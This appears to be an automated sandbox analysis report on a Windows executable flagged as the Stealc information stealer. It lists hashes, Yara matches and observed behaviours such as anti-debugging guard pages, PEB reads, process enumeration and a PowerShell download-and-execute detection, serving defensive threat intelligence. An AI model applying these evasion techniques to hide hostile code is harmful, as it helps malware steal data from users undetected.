Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005445C0 VirtualProtect ?,00000004,00000100,00000000

0_2_005445C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00559860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00559750 mov eax, dword ptr fs:[00000030h]

0_2_00559750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00557850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00557850

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 6652, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00559600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00559600

Source: file.exe, file.exe, 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: q/SProgram Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00557B90

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00556920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00556920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00557850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00557850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00557A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00557A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1783006723.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6652, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1783006723.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6652, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

ID:	1532109
Product:	CloudBasic
Start time:	12:13:08
Start date:	12.10.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	ebddc57c042f9c28f78e5d1fa1c75020
SHA1:	a3252e4609bde886ed5b96b72a439b18fe5bd9a4
SHA256:	c6b0379b9b644a4d5c6cd89d57ace4f95810d31ebf2eb7b9d8310f88c04cfd85
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by